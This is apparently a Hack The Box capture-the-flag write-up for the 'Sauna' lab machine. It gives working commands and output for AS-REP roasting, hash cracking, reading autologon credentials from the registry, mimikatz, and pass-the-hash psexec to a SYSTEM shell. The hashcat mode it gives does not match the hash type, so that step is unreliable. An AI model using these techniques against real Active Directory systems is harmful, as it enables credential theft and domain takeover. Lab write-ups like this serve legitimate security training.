Sauna HTB Writeup
User
After running nmap these ports are open:
Nmap scan report for EGOTISTICALBANK (10.10.10.175)
Host is up (0.17s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-28 03:32:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/27%Time=5E581939%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-28T03:34:31
|_ start_date: N/A
First I add the domain EGOTISTICALBANK to /etc/hosts for later usage maybe. And the first thing I do is visiting the website. From the website after a bit of enumeration all I can get are a bunch of usernames from these pages:
Enumerating ldap port I get nothing more than the hostname which I already know.
Running enum4linux also does not give me much.
Also smbmap gives me nothing. After a bit of research I found out that companies use account username conventions. So maybe I can use some tools with these since I have a lot of ports which can allow me to specify a username without password at first.
I read about Ad user naming conventions and after I try to use the usernames against a impacket tool. The tool I use is caled GetNPUsers and it Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking. After a lot of trial and error I find the password of user beeing fsmith.
/opt/impacket/examples/GetNPUsers.py EGOTISTICALBANK/fsmith -dc-ip 10.10.10.175 -request
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:fdb6fa679238059bc04549980ec57412$2414afe6424ecfa364ca858c8e8b4713374d1f25625add595a3a7386e4b4eccaf2aa5c1edfd59e0026222d000bed930fdb07e9500540960aa75348509adadc8def409b724dc5958b5dc4e9910c33331ef742cfd73dc405a6c6419ce6c20196c3cf90380f3c88af0b310b1b53b9f9b9c34022b9e3d33a0df0acb0fc37322aca41c6493e8d4e45aa941b5ffdebd89dd79b755ac5514dde9e08d5c381b5e9ea99cbc2ed1bc3b9703c512dac781794030804d252e723ad640cc9ca4b5ef543a9d05e4c2d6689e4414b888b5c9e6e9b6f575f837c0d8636a82f2602cf332be121d36cf259abf8d3e24b5f6d9ef3833bfcd9c502370e330c3c90cd90
This would give me the users TGT which I can crack .
hashcat -m 13100 crackme.hash /usr/share/wordlists/rockyou.txt
And I found the password Thestrokes23
I do a full port scanning with verbose on nmap to check if windows remote management is enabled. After finding it is enabled I use evil-winrm and connect to it by providing the username fsmith and the cracked password.
root
From there I run Winpeas or any other enumeration script and find a hidden password inside this registry reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
The password belongs to user svc_loanmgr and the password is Moneymakestheworldgoround!
I login again by using evil-winrm
I generate a reverse shell by using metasploit and then run it. This would give me cmd shell. I then upload mimikatz and get Administrator ntlm hash, which then I use it with psexec and get shell as nt authority\system.
psexec.py administrator@10.10.10.175 -hashes :d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21.dev1+20200220.181330.03cbe6e8 - Copyright 2020 SecureAuth Corporation
[] Requesting shares on 10.10.10.175…..
[] Found writable share ADMIN$
[] Uploading file TkxHqRZj.exe
[] Opening SVCManager on 10.10.10.175…..
[] Creating service Pntp on 10.10.10.175…..
[] Starting service Pntp…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
ReadMore:
Active Directory Attacks